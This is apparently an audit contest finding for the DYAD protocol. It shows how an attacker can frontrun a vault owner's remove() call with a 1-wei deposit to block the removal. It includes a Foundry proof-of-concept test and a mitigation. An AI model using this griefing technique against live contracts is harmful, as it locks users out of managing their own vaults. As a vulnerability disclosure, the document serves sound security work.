DYAD - SovaSlava's results

Lines of code

https://github.com/code-423n4/2024-04-dyad/blob/4a987e536576139793a1c04690336d06c93fca90/src/core/VaultManagerV2.sol#L119-L125

Vulnerability details

Impact

The attacker can prevent the user from removing the volt. When removing the volt, there is a check that there are no funds on it. The protocol allows anyone to make deposits in other people's volts. An attacker can take advantage of this and frontrun the user’s transaction to remove volt, making deposit 1 vei into the user’s vault. The user will receive an error because volt contains funds.

Proof of Concept

Add this code into test/VaultManager.t.sol

 function test_preventRemove() public {
    address user = makeAddr("user");
    address attacker = makeAddr("attacker");

    vm.deal(user, 1 ether);
    vm.deal(attacker, 1 wei);
    vm.startPrank(user);
      uint id = dNft.mintNft{value: 1 ether}(user);
      vaultManager.add(id, address(wethVault));
    vm.stopPrank();
    // Attacker frontrun user's tx vaultManager.remove()
    vm.startPrank(attacker);
      weth.deposit{value: 1 wei}();
      weth.approve(address(vaultManager), 1 wei);
      vaultManager.deposit(id, address(wethVault), 1 wei);
    vm.stopPrank();
    vm.prank(user);
      vm.expectRevert(0x53a4f9b4); // VaultHasAssets.selector
      vaultManager.remove(id, address(wethVault));   
  }

Tools Used

Manual review

Recommended Mitigation Steps

When removing the volt, automatically withdraw funds to the address of the owner of the NFT

Assessed type

Other